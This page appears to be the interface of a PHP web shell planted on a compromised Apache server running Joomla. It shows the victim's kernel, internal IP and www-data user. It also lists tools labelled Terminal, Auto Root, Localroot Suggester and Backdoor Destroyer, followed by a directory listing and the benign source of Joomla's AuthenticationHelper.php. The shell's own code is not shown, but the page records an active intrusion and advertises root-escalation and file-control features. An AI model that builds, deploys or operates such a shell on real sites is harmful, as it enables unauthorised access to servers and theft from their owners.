Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
lusedi /
libraries /
src /
Helper /
Delete
Unzip
Name
Size
Permission
Date
Action
AuthenticationHelper.php
1.27
KB
-rw-r--r--
2017-11-07 06:31
CMSHelper.php
3.13
KB
-rw-r--r--
2017-11-07 06:31
ContentHelper.php
5.46
KB
-rw-r--r--
2017-11-07 06:31
ContentHistoryHelper.php
4.57
KB
-rw-r--r--
2017-11-07 06:31
LibraryHelper.php
4.62
KB
-rw-r--r--
2017-11-07 06:31
MediaHelper.php
10.82
KB
-rw-r--r--
2017-11-07 06:31
ModuleHelper.php
16.32
KB
-rw-r--r--
2017-11-07 06:31
RouteHelper.php
7.04
KB
-rw-r--r--
2017-11-07 06:31
SearchHelper.php
1.86
KB
-rw-r--r--
2017-11-07 06:31
TagsHelper.php
29.34
KB
-rw-r--r--
2017-11-07 06:31
UserGroupsHelper.php
5.4
KB
-rw-r--r--
2017-11-07 06:31
Save
Rename
<?php /** * Joomla! Content Management System * * @copyright Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\CMS\Helper; defined('JPATH_PLATFORM') or die; /** * Authentication helper class * * @since 3.6.3 */ abstract class AuthenticationHelper { /** * Get the Two Factor Authentication Methods available. * * @return array Two factor authentication methods. * * @since 3.6.3 */ public static function getTwoFactorMethods() { // Get all the Two Factor Authentication plugins. \JPluginHelper::importPlugin('twofactorauth'); // Trigger onUserTwofactorIdentify event and return the two factor enabled plugins. $identities = \JEventDispatcher::getInstance()->trigger('onUserTwofactorIdentify', array()); // Generate array with two factor auth methods. $options = array( \JHtml::_('select.option', 'none', \JText::_('JGLOBAL_OTPMETHOD_NONE'), 'value', 'text'), ); if (!empty($identities)) { foreach ($identities as $identity) { if (!is_object($identity)) { continue; } $options[] = \JHtml::_('select.option', $identity->method, $identity->title, 'value', 'text'); } } return $options; } }